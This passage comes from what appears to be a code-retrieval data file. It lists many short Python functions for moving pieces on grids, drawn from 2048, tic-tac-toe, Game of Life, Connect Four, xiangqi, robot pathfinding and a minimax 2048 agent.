grid_y)\n self.board[grid_y][grid_x] = self.X\n\n elif player == self.O:\n self.draw_O(grid_x, grid_y)\n self.board[grid_y][grid_x] = self.O", "def move(self, direction):\n no_change = True\n if direction == UP or direction == DOWN:\n other_direction = self.get_grid_height()\n elif direction == LEFT or direction == RIGHT:\n other_direction = self.get_grid_width()\n for first_index in self._indices[direction]:\n row = first_index[0]\n col = first_index[1]\n line = []\n for _ in range(other_direction):\n line.append(self.get_tile(row, col))\n row += OFFSETS[direction][0]\n col += OFFSETS[direction][1]\n merged_line = merge(line)\n \n if merged_line != line:\n no_change = False\n \n row = first_index[0]\n col = first_index[1]\n for idx in range(other_direction):\n self.set_tile(row, col, merged_line[idx])\n row += OFFSETS[direction][0]\n col += OFFSETS[direction][1]\n if no_change == False: \n self.new_tile()", "def move(self, direction):\r\n # replace with your code\r\n row_dir = OFFSETS[direction][0]\r\n col_dir = OFFSETS[direction][1]\r\n \r\n if row_dir == 0:\r\n new_cells = self._cells\r\n new_dir = col_dir\r\n else:\r\n new_tuples = zip(*self._cells)\r\n new_cells = [list(item) for item in new_tuples]\r\n new_dir = row_dir\r\n \r\n tmp_cells = []\r\n for lists in new_cells:\r\n lists = lists[::new_dir]\r\n merge_lists = merge(lists)\r\n tmp_cells.append(merge_lists[::new_dir])\r\n \r\n if row_dir == 0:\r\n self._cells = tmp_cells\r\n else:\r\n new_tuples = zip(*tmp_cells)\r\n new_cells = [list(item) for item in new_tuples]\r\n self._cells = new_cells\r\n \r\n self.new_tile()", "def move(self, direction):\r\n # replace with your code\r\n initial_tile = self.__direct_top[direction]\r\n offset = OFFSETS[direction]\r\n direct_range = self.__direct_range[direction] \r\n backup_list = [[0 for dummy_col in range(self.grid_width)] for dummy_row in range(self.grid_height)]\r\n \r\n for initial_count, tile_cursor in enumerate(initial_tile):\r\n tem_list = []\r\n grid_cursor = tile_cursor\r\n for dummy_cursor in range(direct_range):\r\n \r\n tem_list.append(self.grid[grid_cursor[0]][grid_cursor[1]])\r\n grid_cursor = tuple(x + y for x,y in zip(grid_cursor,offset))\r\n \r\n new_list = merge(tem_list)\r\n if self.update_dict[direction] == 0:\r\n for col_cursor in range(direct_range):\r\n backup_list[col_cursor][initial_count] = new_list[col_cursor]\r\n elif self.update_dict[direction] == 1: \r\n for col_cursor in range(direct_range):\r\n backup_list[self.grid_height -1 - col_cursor][initial_count] = new_list[col_cursor]\r\n elif self.update_dict[direction] ==3:\r\n backup_list[initial_count] = new_list\r\n else:\r\n for col_cursor in range(direct_range):\r\n backup_list[initial_count][self.grid_width -1 - col_cursor] = new_list[col_cursor]\r\n \r\n flag = (self.grid == backup_list)\r\n self.grid = backup_list\r\n if not flag:\r\n self.new_tile()", "def move(self, direction):\r\n\r\n # ternary operator setting dimension variable\r\n dim = self.get_grid_width() if (direction == \"LEFT\" or direction ==\r\n \"RIGHT\") else self.get_grid_height()\r\n self.get_row(direction, dim)\r\n self.new_tile()", "def make_move(grid, n_columns, n_rows):\r\n # Generate the game grid to be manipulated\r\n new_grid = [[0] * (n_columns + 1) for i in range(n_rows + 1)]\r\n\r\n\r\n for i in range(n_rows):\r\n for j in range(n_columns):\r\n upper_left = grid[i-1][j-1] # neighbor to upper left of cell of interest\r\n upper = grid[i-1][j] # neighbor above cell of interest\r\n upper_right = grid[i-1][j+1] # neighbor to upper right of cell of interest\r\n left = grid[i][j-1] # neighbor to left of cell of interest\r\n right = grid[i][j+1] # neighbor to right of cell of interest\r\n bot_left = grid[i+1][j-1] # neighbor to bottom left cell of interest\r\n bot = grid[i+1][j] # neighbor below cell of interest\r\n bot_right = grid[i+1][j+1] # neighbor to bottom right of cell of interest\r\n\r\n # sum of the state of all neighbors\r\n on_neighbors = upper_left + upper + upper_right + left + right + bot_left + bot + bot_right\r\n\r\n # Any ON cell with fewer than two ON neighbors turns OFF\r\n if grid[i][j] == 1 and on_neighbors < 2:\r\n new_grid[i][j] = 0\r\n\r\n # Any ON cell with two or three ON neighbours stays ON\r\n elif grid[i][j] == 1 and (on_neighbors == 2 or on_neighbors == 3):\r\n new_grid[i][j] = 1\r\n\r\n # Any ON cell with more than three ON neighbors turns OFF\r\n elif grid[i][j] == 1 and on_neighbors > 3:\r\n new_grid[i][j] = 0\r\n\r\n # Any OFF cell with three ON neighbors turns ON\r\n elif grid[i][j] == 0 and on_neighbors == 3:\r\n new_grid[i][j] = 1\r\n\r\n return new_grid #manipulated game grid\r", "def move(self, direction):\n command = self.DIRECTIONS[direction][\"command\"]\n mem, out = self.cpu.run_program(inputs=[command])\n status = out.pop()\n if status in (1, 2):\n self.position = Point(\n self.position.x + self.DIRECTIONS[direction][\"mask\"][0],\n self.position.y + self.DIRECTIONS[direction][\"mask\"][1]\n )\n if self.display:\n self.draw_grid()\n sleep(self.delay)\n return status", "def make_move(self):\n self.owner = self.game.current_turn\n self.status = 'X' if self.owner == self.game.creator else 'O'\n ####\n #Random turn??\n ####\n self.save(update_fields=['status', 'owner'])\n\n # Add log entry for move\n self.game.add_log(f'cell made at ({self.row}, {self.col}) by {self.owner}')\n\n # Set the current turn for the other player if game is not over\n # Check if find winner\n if self.game.check_win(cell=self) or\\\n self.game.get_all_game_cells().filter(status='EMPTY').count() == 0:\n print(\"Winnnnnnnn\")\n self.game.mark_complete(winner=self.owner)\n\n # Switch player turn\n self.game.switch_turn()\n\n # Let the game know about the move and result\n self.send_game_update()", "def move(self):\n \"\"\" Responsible for transformations \"\"\"\n pos, com, success = self.perception \n if self.destination is None:\n return array([0,0])\n\n if not self.awake:\n return array([0,0])\n\n\n if self.phase == 4 and self.proper_formation is not None:\n no_go = []\n for i in range(0,len(self.proper_formation)):\n if i != self.order and self.proper_formation[i][0] == self.proper_formation[self.order][0]:\n no_go.append(self.transform(self.proper_formation[i][1] - self.position))\n pos = merge_array_lists(pos, no_go)\n\n if self.phase == 2:\n point = self.destination.copy() - self.position\n elif self.phase > 2:\n point = self.transform(self.destination.copy() - self.position)\n else:\n point = self.destination.copy()\n\n if not array_equal(point, array([0,0])):\n reachable, path = findpathtoclosest(array([0,0]), point, pos)\n \n if len(path) == 0:\n move = array([0,0]) \n else:\n move = path[0]\n if not reachable and not array_equal(move,array([0,0])):\n if self.phase == 2:\n self.closest_i_could_get = path[-1] + self.position\n elif self.phase > 2:\n self.closest_i_could_get = self.transform2(path[-1]) + self.position\n else:\n self.closest_i_could_get = path[-1]\n elif not reachable:\n if self.phase > 1:\n self.closest_i_could_get = self.position\n else:\n self.closest_i_could_get = array([0,0])\n else:\n self.closest_i_could_get = None\n\n if reachable and self.phase == 4 and array_equal(move,array([0,0])):\n move = self.randomStep()\n self.closest_i_could_get = None\n\n else:\n move = array([0,0])\n self.closest_i_could_get = None\n\n return move", "def motion(self):\n priority = {\"north\": [-1, 0], \"south\": [1, 0],\n \"east\": [0, 1], \"west\": [0, -1]}\n\n priority_list = [\"north\", \"south\", \"east\", \"west\"]\n\n critical_point = False\n while critical_point is False:\n row = self.curr_cell.row\n column = self.curr_cell.col\n\n if self.allow_to_move(priority_list[0],\n row + priority[priority_list[0]][0],\n column + priority[priority_list[0]][1]):\n\n self.move(priority_list[0])\n\n elif self.allow_to_move(priority_list[1],\n row + priority[priority_list[1]][0],\n column + priority[priority_list[1]][1]):\n\n self.move(priority_list[1])\n\n elif self.allow_to_move(priority_list[2],\n row + priority[priority_list[2]][0],\n column + priority[priority_list[2]][1]):\n\n self.move(priority_list[2])\n\n elif self.allow_to_move(priority_list[3],\n row + priority[priority_list[3]][0],\n column + priority[priority_list[3]][1]):\n\n self.move(priority_list[3])\n\n else:\n # Robot isolated\n critical_point = True\n\n return self.curr_cell, self.path", "def move(self, direction):\r\n # we are initializing the required variables\r\n num_steps=0\r\n if direction== UP or direction==DOWN:\r\n num_steps=self._height\r\n if direction==LEFT or direction==RIGHT:\r\n num_steps=self._width\r\n move_in=OFFSETS[direction]\r\n temp_list=[]\r\n moved=False \r\n # merging the list in the particular direction\r\n for start_cell in self._initial_cells[direction]:\r\n for step in range(num_steps):\r\n row = start_cell[0] + step * move_in[0]\r\n col = start_cell[1] + step * move_in[1]\r\n # creating a list of all the columns and rows in that direction \r\n temp_list.append(self._grid[row][col])\r\n # caling the merge function to calculate the resultant list\r\n merged_list=merge(temp_list)\r\n # putting back the resultant list\r\n for step in range(num_steps):\r\n row = start_cell[0] + step * move_in[0]\r\n col = start_cell[1] + step * move_in[1]\r\n self._grid[row][col]=merged_list[step]\r\n # cheking for any changes in the board\r\n if temp_list!=merged_list:\r\n moved=True\r\n temp_list=[]\r\n #adding anew tile\r\n if moved:\r\n self.new_tile()", "def move(self, direction):\n # replace with your code\n\n indices = self.direction_indices[direction]\n for coordinate in indices:\n merged_coordinate_list = self.get_list(direction, coordinate)\n self.change_board(merged_coordinate_list, coordinate, direction)\n print(self.__str__())\n if self.board_is_not_full():\n self.new_tile()", "def move(self, direction):\n # We will add a new tile only if something has moved\n moved = False\n \n # We may extract a row or a column.\n loop_length = self._height + self._width \\\n - len(self._initial_tiles[direction])\n \n # Offsets for grid traversal\n row_off, col_off = OFFSETS[direction]\n \n for row, col in self._initial_tiles[direction]:\n # Computing positions of tiles to extract\n pos_list = [(row + index * row_off, \n col + index * col_off) \n for index in xrange(loop_length)]\n \n # Getting values from the grid and merging\n extracted_list = [self.get_tile(*pos) for pos in pos_list]\n merge_list = merge(extracted_list)\n \n # We modify the grid only if it has changed\n for pos, val_1, val_2 in zip(pos_list, extracted_list, merge_list):\n if val_1 - val_2:\n self.set_tile(*pos, value = val_2)\n moved = True\n \n # Any changes?\n if moved:\n self.new_tile()", "def make_move(self, tower):\r\n height, index = self.__find_random_moves(tower)\r\n \r\n if self.stat_brain.all_valid(tower) == 0 or self.stat_brain.is_valid(height, index, tower):\r\n return height, index\r\n else:\r\n while not self.stat_brain.is_valid(height, index, tower):\r\n height, index = self.__find_random_moves(tower)\r\n \r\n return height, index", "def update(self, move):\n\n if not 0 <= move < 7:\n raise InvalidMove\n\n placed = False\n x = None\n y = None\n\n for row in reversed(xrange(self._rows)):\n if not self._board[row][move]:\n self._board[row][move] = self.current_player\n placed = True\n x = move\n y = row\n break\n\n if not placed:\n raise InvalidMove\n\n return (x, y)", "def move(self, row: int, col: int, player: int):\n def addup(dict_name, invalid_set, another_invalid, locx, locy):\n if locx == locy:\n diag_name = (1,1)\n if diag_name not in invalid_set:\n dict_name[diag_name] += 1\n if dict_name[diag_name] == self.tar:\n return player\n another_invalid.add(diag_name)\n if locx == self.tar-1-locy:\n diag_name = (-1, -1)\n if diag_name not in invalid_set:\n dict_name[diag_name] += 1\n if dict_name[diag_name] == self.tar:\n return player\n another_invalid.add(diag_name)\n curcol = (locy, None)\n currow = (None, locx)\n if curcol not in invalid_set:\n dict_name[curcol] += 1\n if dict_name[curcol] == self.tar:\n return player\n another_invalid.add(curcol)\n if currow not in invalid_set:\n dict_name[currow] += 1\n if dict_name[currow] == self.tar:\n return player\n another_invalid.add(currow)\n return 0\n res = 0\n if (row, col) not in self.walked:\n if player == 1:\n res = addup(self.p1, self.invalid_1, self.invalid_2, row, col)\n if player == 2:\n res = addup(self.p2, self.invalid_2, self.invalid_1, row, col)\n self.walked.add((row, col))\n return res", "def move_agent(self, state):\n m = self.m\n n = self.n\n\n cur_env = deepcopy(state.grid)\n cur_env[m, n] = 0\n action = self.choose_action(state)\n\n if action == 'Right':\n if n + 1 >= grid_size or cur_env[m][n+1] != 0:\n Rew = -2 # Reward -5 if we move into wall or another agent\n self.collisions += 1\n else:\n n += 1\n Rew = -0.1 # Reward -1 otherwise\n a = 0 # Action number\n elif action == 'Left':\n if n - 1 < 0 or cur_env[m][n-1] != 0:\n Rew = -2\n self.collisions += 1\n else:\n n -= 1\n Rew = -0.1\n a = 1\n elif action == 'Up':\n if m - 1 < 0 or cur_env[m-1][n] != 0:\n Rew = -2\n self.collisions += 1\n else:\n m -= 1\n Rew = -0.1\n a = 2\n elif action == 'Down':\n if m + 1 >= grid_size or cur_env[m+1][n] != 0:\n Rew = -2\n self.collisions += 1\n else:\n m += 1\n Rew = -0.1\n a = 3\n\n m = m % grid_size\n n = n % grid_size\n self.m = m # Update position of agent\n self.n = n # Update position of agent\n cur_env[m][n] = 1 # Update grid\n new_state = State(cur_env, [m, n]) # Set new state\n terminal = False\n\n if [m, n] == self.end:\n Rew = 10\n terminal = True\n self.carry = True\n\n return new_state, a, Rew, terminal", "def move(self, board):\n\n if board.get_number_of_moves() == 0:\n random_row = randint(0, 2)\n random_column = randint(0, 2)\n\n if random_row == 1 or random_column == 1:\n random_row = 1\n random_column = 1\n elif random_row == 2:\n random_row = board.get_dimension()-1\n\n if random_column == 2:\n random_column = board.get_dimension()-1\n\n move = (random_row, random_column)\n elif board.get_number_of_moves() == 1 or board.get_number_of_moves() == 2:\n if board.get_piece(1,1) == ' ':\n move = (1, 1)\n else:\n board_dimension = board.get_dimension()-1\n corners = [(0, 0), (0, board_dimension), (board_dimension, 0), (board_dimension, board_dimension)]\n corners = self.remove_filled_positions(corners, board)\n\n move = corners[randint(0, len(corners)-1)]\n else:\n move = self.check_for_winner(board)\n\n if move == (-1, -1):\n board_dimension = board.get_dimension()-1\n corner1_moves = self.remove_filled_positions([(0, 0), (2, 2)], board)\n corner2_moves = self.remove_filled_positions([(0, 2), (2, 0)], board)\n\n non_corner_moves = self.remove_filled_positions([(1, 0), (2, 1), (1, 2), (0, 1)], board)\n\n center_piece = board.get_piece(1, 1)\n corner_pieces = [board.get_piece(0, 0), board.get_piece(board_dimension, 0), board.get_piece(0, board_dimension), board.get_piece(board_dimension, board_dimension)]\n\n if corner_pieces[0] != self._piece and corner_pieces[0] != ' ' and corner_pieces[0] == corner_pieces[3]:\n move = non_corner_moves[randint(0, 3)]\n elif corner_pieces[1] != self._piece and corner_pieces[1] != ' ' and corner_pieces[1] == corner_pieces[2]:\n move = non_corner_moves[randint(0, 3)]\n elif len(corner2_moves) > 0 and corner_pieces[0] != self._piece and corner_pieces[0] == center_piece and corner_pieces[3] == self._piece:\n move = corner2_moves[0]\n elif len(corner1_moves) > 0 and corner_pieces[1] != self._piece and corner_pieces[1] == center_piece and corner_pieces[2] == self._piece:\n move = corner1_moves[0]\n elif len(corner1_moves) > 0 and corner_pieces[2] != self._piece and corner_pieces[2] == center_piece and corner_pieces[1] == self._piece:\n move = corner1_moves[0]\n elif len(corner2_moves) > 0 and corner_pieces[3] != self._piece and corner_pieces[3] == center_piece and corner_pieces[0] == self._piece:\n move = corner2_moves[0]\n else:\n move = self.can_complete_two_in_row(board)\n\n if move == (-1, -1):\n move = (randint(0, board.get_dimension()-1), randint(0, board.get_dimension()-1))\n\n while not board.check_move(move[0], move[1]):\n move = (randint(0, board.get_dimension()-1), randint(0, board.get_dimension()-1))\n\n return move", "def move(coord, direction):\n vInc, hInc = dirToIncrement(direction)\n return (coord[0]+vInc, coord[1]+hInc)", "def move(self, rel_pos):\n self.pos = (self.pos[0] + rel_pos[0] * GRID, self.pos[1] + rel_pos[1] * GRID)", "def try_move(self, direction=None):\n if direction == 'rotate':\n return (self.origin, self.simple_rotate())\n else:\n return (self.get_new_origin(direction=direction), self.positions)", "def move(self, board):\n\n move = (randint(0, board.get_dimension()-1), randint(0, board.get_dimension()-1))\n\n while not board.check_move(move[0], move[1]):\n move = (randint(0, board.get_dimension()-1), randint(0, board.get_dimension()-1))\n\n return move", "def move(self, direction):\r\n direc = list(OFFSETS[direction])\r\n line = []\r\n dummy_board = self.board[:]\r\n if direction == 3:\r\n for i in range(self.height):\r\n self.board[i] = merge(self.board[i])\r\n self.compare(dummy_board)\r\n return self.board\r\n \r\n elif direction == 4:\r\n for i in range(self.height):\r\n line = self.board[i][::-1]\r\n self.board[i] = merge(line)\r\n self.board[i] = self.board[i][::-1]\r\n self.compare(dummy_board)\r\n return self.board\r\n \r\n \r\n elif direction == 1 or 2:\r\n dummy_board = str(self.board[:])\r\n if direction == 1:\r\n tile = [0,0]\r\n elif direction == 2:\r\n tile = [self.height - 1, 0]\r\n for i in range(self.width):\r\n tile2 = tile[:]\r\n while len(line) < self.height:\r\n line.append(self.get_tile(*tile2))\r\n tile2 = [x+y for x,y in zip(direc, tile2)]\r\n line = merge(line)\r\n tile2 = tile[:]\r\n for i in range(self.height):\r\n self.set_tile(*(tile2+[line[0]]))\r\n line.remove(line[0])\r\n tile2 = [x+y for x,y in zip(direc, tile2)]\r\n tile = [x+y for x,y in zip(tile, [0,1])]\r\n if dummy_board != self.__str__():\r\n self.new_tile()\r\n return self.board", "def move(self, coordinates, direction):\n pass", "def get_move(self, direction):\n pos = self._state.index(0)\n row = pos // self._size\n col = pos % self._size\n moves = get_moves(self._size, col, row)\n new_state = self._state\n if direction in moves:\n if moves[direction]['is_movable']:\n new_state = move(self._state, pos, moves[direction]['rel_pos'])\n return Node(new_state, heuristic=self._heuristic,\n g_score=self._g_score+self._cost(self._state, new_state))", "def _move_receptor_to_grid_center(self):\n lower_receptor_corner = np.array([self._crd[:,i].min() for i in range(3)], dtype=float)\n upper_receptor_corner = np.array([self._crd[:,i].max() for i in range(3)], dtype=float)\n \n receptor_box_center = (upper_receptor_corner + lower_receptor_corner) / 2.\n grid_center = (self._origin_crd + self._uper_most_corner_crd) / 2.\n displacement = grid_center - receptor_box_center\n\n print(\"Receptor is translated by \", displacement)\n\n for atom_ind in range(len(self._crd)):\n self._crd[atom_ind] += displacement\n return None", "def get_new_position(cls, position_x, position_y, direction):\n new_position_x = cls.calculate_position_x(position_x, direction)\n new_position_y = cls.calculate_position_y(position_y, direction)\n return new_position_x, new_position_y", "def get_move(self, board):\n # First, check if we can win in the next move\n winning_move = self.get_winning_move(board, self.letter)\n if winning_move is not None:\n return winning_move\n # Check if the player could win on their next move, and block them.\n blocking_move = self.get_winning_move(board, self.opponent_letter)\n if blocking_move is not None:\n return blocking_move\n # Try to take one of the corners, if they are free.\n corner_move = self.move_in_a_corner(board)\n if corner_move is not None:\n return corner_move\n # Try to take the center, if it is free.\n if board.size % 2 == 1:\n if board.is_position_availible(board.letters[board.size // 2]\n + board.numbers[board.size // 2]):\n return board.letters[board.size // 2] + board.numbers[board.size // 2]\n # Move on one of the sides.\n return self.choose_random_move_from_list(board, list(board.positions.keys()))", "def move(self, direction: Direction) -> \"TilePosition\":\r\n return TilePosition(self.tile_x + direction.dx, self.tile_y + direction.dy)", "def move(self, direction):\r\n \r\n tiles_changed = False\r\n \r\n #create a list for the values of the initial tile\r\n #depending the direction\r\n if direction == UP or direction == DOWN:\r\n num_steps = self._grid_height\r\n else:\r\n num_steps = self._grid_width\r\n \r\n #iterate through the cells depending the direction\r\n for each_cell in self._initial_indices[direction]:\r\n \r\n cell_value_list = []\r\n #take the values of the cells\r\n for step in range(num_steps):\r\n row = each_cell[0] + step * OFFSETS[direction][0]\r\n col = each_cell[1] + step * OFFSETS[direction][1]\r\n cell_value_list.append(self._cells[row][col])\r\n \r\n #merge the list created above\r\n merged_list = merge(cell_value_list)\r\n \r\n #check if the values have changed\r\n if merged_list != cell_value_list:\r\n tiles_changed = True\r\n \r\n #put the merged list int the grid \r\n for step in range(num_steps):\r\n row = each_cell[0] + step * OFFSETS[direction][0]\r\n col = each_cell[1] + step * OFFSETS[direction][1]\r\n self.set_tile(row, col, merged_list[step])\r\n \r\n if tiles_changed:\r\n self.new_tile()", "def update_grid(self):\n # Check to see if we have moved squares\n _new_grid = self.calc_grid()\n if _new_grid == self._grid:\n return\n # Remove from old square and add to new square\n self.target._grid[self._grid][self._type].discard(self)\n self.target._grid[_new_grid][self._type].add(self)\n # Update coordinates\n self._grid = _new_grid", "def move(self, direction):\r\n # replace with your code\r\n row_increment = OFFSETS[direction][0]\r\n col_increment = OFFSETS[direction][1]\r\n changed = False\r\n for header in self._grid_headers[direction]:\r\n row_header = header[0]\r\n col_header = header[1]\r\n source_line = []\r\n # get the source line first\r\n while (row_header >= 0) and (col_header >= 0) and (row_header < self._grid_height) and (col_header < self._grid_width):\r\n source_line.append(self.get_tile(row_header, col_header))\r\n row_header += row_increment\r\n col_header += col_increment\r\n # merge\r\n result_line = merge(source_line)\r\n # write the result back\r\n row_header = header[0]\r\n col_header = header[1]\r\n result_line_index = 0\r\n while (row_header >= 0) and (col_header >= 0) and (row_header < self._grid_height) and (col_header < self._grid_width):\r\n self.set_tile(row_header, col_header, result_line[result_line_index])\r\n if result_line[result_line_index] != source_line[result_line_index]:\r\n changed = True\r\n result_line_index += 1\r\n row_header += row_increment\r\n col_header += col_increment\r\n if changed:\r\n self.new_tile()", "def make_move(self, playername, coordinates, direction):\n\n pass", "def make_move(self, start, end):\r\n start_pos = self.parse_pos(start) # Start and end position are lists that contain column and row\r\n end_pos = self.parse_pos(end)\r\n\r\n start_row = start_pos[0] # Position of row and columns are assigned to variables\r\n start_col = start_pos[1]\r\n end_row = end_pos[0]\r\n end_col = end_pos[1]\r\n\r\n board = self._board.get_board()\r\n start_piece = board[start_row][start_col].get_piece()\r\n end_piece = board[end_row][end_col].get_piece()\r\n\r\n\r\n # If there is no piece to be moved or game is over or piece is to be moved to its original location\r\n if start_piece is None or self._game_state != \"UNFINISHED\"\\\r\n or (start_row == end_row and start_col == end_col):\r\n return False\r\n\r\n start_piece_id = start_piece.get_player_id() # Contains the player id associated with the piece\r\n end_piece_player_id = None\r\n if end_piece is not None: # Executes if end piece contains a piece object\r\n end_piece_player_id = end_piece.get_player_id()\r\n\r\n # If Red's turn\r\n if self._player_turn == 1:\r\n if start_piece_id != 'r': # If red moves a black piece\r\n return False\r\n if start_piece.is_legal_move(start, end, start_piece, end_piece_player_id, board) : # Checks the legal move conditions\r\n if self.move_piece(start, end): # Returns False if move is invalid\r\n # Checks if move violates flying general and puts self in check\r\n if self.is_not_flying_general() is True and self.is_in_check(\"red\") is False:\r\n self.change_player_turn()\r\n self.is_in_checkmate()\r\n return True\r\n else: # Reverses the move if violates flying general rule\r\n self.reverse_move(start, end, board,end_piece_player_id, end_piece)\r\n return False\r\n\r\n else:\r\n return False\r\n else:\r\n return False\r\n\r\n # If Black's turn\r\n elif self._player_turn == -1:\r\n if start_piece_id != 'b': # If black moves a red piece\r\n return False\r\n if start_piece.is_legal_move(start, end, start_piece, end_piece_player_id, board): # Checks the legal move conditions\r\n if self.move_piece(start, end): # Returns False if move is invalid\r\n if self.is_not_flying_general() is True and self.is_in_check(\"black\") is False:\r\n self.change_player_turn()\r\n self.is_in_checkmate()\r\n return True\r\n else: # Reverses the move if violates flying general rule\r\n self.reverse_move(start, end, board, end_piece_player_id, end_piece)\r\n return False\r\n else:\r\n return False\r\n else:\r\n return False", "def getMove(self, grid):\n# global prune\n# prune = 0\n def Terminal(stateTup):\n \"\"\"\n Checks if the node is a terminal node\n Returns eval(state) if it is terminal\n \"\"\"\n state = stateTup[0]\n maxDepth = self.depthLimit\n if stateTup[1] == maxDepth:\n val = self.h.get(str(state.map))\n if val == None:\n Val = Eval(state)\n self.h[str(state.map)] = Val\n return Val\n else:\n return val\n elif len(stateTup[0].getAvailableMoves()) == 0:\n val = self.h.get(str(state.map))\n if val == None:\n Val = Eval(state)\n self.h[str(state.map)] = Val\n return Val\n else:\n return val\n\n def Eval(state):\n \"\"\"\n This is the eval function which combines many heuristics and assigns\n weights to each of them\n Returns a single value\n \"\"\"\n\n# H1 = htest2(state)\n# return H1\n H2 = h1(state)*monotonic(state)\n return H2\n\n\n def h1(state):\n Max = state.getMaxTile()\n left = len(state.getAvailableCells())/16\n if state.getCellValue([0,0]) == Max:\n v = 1\n else:\n v= 0.3\n Max = Max/1024\n return Max*left*v\n\n def mono(state):\n mon = 0\n# for i in range(4):\n# row = 0\n# for j in range(3):\n# if state.map[i][j] > state.map[i][j+1]:\n# row+=1\n# if row == 4:\n# mon += 1\n# for i in range(4):\n# column = 0\n# for j in range(3):\n# if state.map[j][i] > state.map[j+1][i]:\n# column +=1\n# if column == 4:\n# mon +=1\n#\n#\n# return mon/8\n for i in range(4):\n if all(earlier >= later for earlier, later in zip(grid.map[i], grid.map[i][1:])):\n mon+=1\n\n return mon/8\n\n def monotonic(state):\n cellvals = {}\n Path1 = [(3,0),(3,1),(3,2),(3,3),(2,3),(2,2),(2,1),(2,0),\n (1,0),(1,1),(1,2),(1,3),(0,3),(0,2),(0,1),(0,0)]\n for i in Path1:\n cellvals[i] = state.getCellValue(i)\n mon = 0\n for i in range(4):\n if cellvals.get((i,0)) >= cellvals.get((i,1)):\n if cellvals.get((i,1)) >= cellvals.get((i,2)):\n if cellvals.get((i,2)) >= cellvals.get((i,3)):\n mon +=1\n for j in range(4):\n if cellvals.get((0,j)) >= cellvals.get((1,j)):\n if cellvals.get((1,j)) >= cellvals.get((2,j)):\n if cellvals.get((2,j)) >= cellvals.get((3,j)):\n mon+=1\n return mon/8\n\n\n\n def htest2(state):\n score1 = 0\n score2 = 0\n r = 0.5\n\n Path1 = [(3,0),(3,1),(3,2),(3,3),(2,3),(2,2),(2,1),(2,0),\n (1,0),(1,1),(1,2),(1,3),(0,3),(0,2),(0,1),(0,0)]\n Path2 = [(3,0),(2,0),(1,0),(0,0),(0,1),(1,1),(2,1),(3,1),\n (3,2),(2,2),(1,2),(0,2),(0,3),(1,3),(2,3),(3,3)]\n valDict = {}\n for n in range(16):\n valDict[Path1[n]] = state.getCellValue(Path1[n])\n for n in range(16):\n if n%3 == 0:\n self.emergency()\n cell1 = valDict.get(Path1[n])\n cell2 = valDict.get(Path2[n])\n score1 += (cell1) * (r**n)\n score2 += (cell2) * (r**n)\n return max(score1,score2)\n\n\n def Maximize(stateTup,A,B):\n \"\"\"\n Returns a tuple of state,eval(state)\n Takes in a stateTup(tuple of grid + depth of the grid), alpha,\n and beta\n \"\"\"\n self.emergency()\n t = Terminal(stateTup)\n if t != None:\n return (None, t)\n\n maxChild , maxUtility = None,-999999999\n state = stateTup[0]\n Map = self.dict.get(str(state.map))\n if Map == None:\n children = []\n for M in range(4):\n g = state.clone()\n if g.move(M):\n children.append(g)\n self.dict[str(state.map)] = children\n else:\n children = Map\n for child in children:\n childTup = (child,stateTup[1]+1)\n utility = Minimize(childTup,A,B)[1]\n if utility > maxUtility:\n maxChild , maxUtility = child , utility\n if maxUtility >= B:\n# global prune\n# prune +=1\n break\n if maxUtility > A:\n A = maxUtility\n\n return (maxChild,maxUtility)\n\n\n def Minimize(stateTup,A,B):\n \"\"\"\n Returns a tuple of state,eval(state)\n Takes in a stateTup(tuple of grid + depth of the grid), alpha,\n and beta\n \"\"\"\n self.emergency()\n t = Terminal(stateTup)\n if t != None:\n return (None, t)\n\n minChild , minUtility = None,999999999\n state = stateTup[0]\n Map= self.dict.get(str(state.map))\n if Map == None:\n cells= state.getAvailableCells()\n children = []\n tiles = [2,4]\n for i in cells:\n for j in tiles:\n g = state.clone()\n g.insertTile(i,j)\n children.append(g)\n self.dict[str(state.map)] = children\n else:\n children = Map\n for child in children:\n childTup = (child,stateTup[1]+1)\n utility = Maximize(childTup,A,B)[1]\n if utility < minUtility:\n minChild , minUtility = child , utility\n if minUtility <= A:\n# global prune\n# prune +=1\n break\n if minUtility < B:\n B = minUtility\n\n return (minChild,minUtility)\n\n\n\n def decision(grid):\n \"\"\"\n Decision function which returns the move which led to the state\n \"\"\"\n child = Maximize((grid,0),-999999999,999999999)[0]\n Child = child.map\n g = grid.clone()\n for M in range(4):\n if g.move(M):\n if g.map == Child:\n # global prune\n # global pruneLog\n # pruneLog.append(prune)\n # print(prune)\n # print(sum(pruneLog)/len(pruneLog))\n return M\n g = grid.clone()\n\n self.dict = {}\n self.h = {}\n self.prevTime = time.clock()\n self.depthLimit = 1\n self.mL = []\n self.over = False\n while self.over == False:\n self.depthLimit +=1\n try :\n self.mL.append(decision(grid))\n\n except KeyError:\n# print(self.depthLimit)\n return self.mL[-1]\n except IndexError:\n return random.randint(0,3)\n self.Alarm(time.clock())\n return self.mL[-1]", "def move_robot(room, direction):\r\n\r\n robot_row, robot_col = robot_location(room)\r\n\r\n intended_row = robot_row\r\n intended_col = robot_col\r\n\r\n if direction == \"right\":\r\n intended_col = robot_col + 1\r\n elif direction == \"left\":\r\n intended_col = robot_col - 1\r\n elif direction == \"up\":\r\n intended_row = robot_row - 1\r\n elif direction == \"down\":\r\n intended_row = robot_row + 1\r\n\r\n if room[intended_row][intended_col] != \"obstacle\":\r\n room[intended_row][intended_col] = \"robot\"\r\n room[robot_row][robot_col] = \"empty\"\r\n\r\n return room", "def pathfinder(starting_position: tuple, target_position: tuple, grid: np.ndarray) -> List[tuple] or None:\n moves_dict = {(1, 0): \"DOWN\", (-1, 0): \"UP\", (0, 1): \"RIGHT\", (0, -1): \"LEFT\"}\n\n moves = []\n path = []\n dead_ends = []\n\n def rate_position(current, target):\n \"\"\"\n Helper function to calculate distance to target\n \"\"\"\n return (target[0] - current[0]) ** 2 + (target[1] - current[1]) ** 2\n\n # Setting starting position\n current_position = starting_position\n while current_position != target_position:\n possible_moves = {}\n # Checking for each possible move and rating them\n for m in moves_dict.keys():\n if check_valid_move(grid, current_position, m):\n new_position = tuple(np.add(current_position, m))\n new_position_rating = rate_position(new_position, target_position)\n if new_position not in path and new_position not in dead_ends:\n possible_moves[new_position_rating] = m\n\n # if there are possible move, select the one, that would move us the closest to target\n if possible_moves:\n path.append(current_position) # save position to path\n moves.append(possible_moves[min(possible_moves)]) # save move to move list\n current_position = tuple(np.add(current_position, possible_moves[min(possible_moves)]))\n # if not, go back one move and add current position to dead ends\n else:\n # if no moves available from the start, return None\n if current_position == starting_position:\n return None\n dead_ends.append(current_position) # save position to dead ends\n current_position = path[-1] # move back one step\n path.pop(-1) # delete step from path\n moves.pop(-1) # delete move from move list\n\n return [tuple(moves_dict[move] for move in moves)]", "def move(self, position, direction):\n i, j = position\n 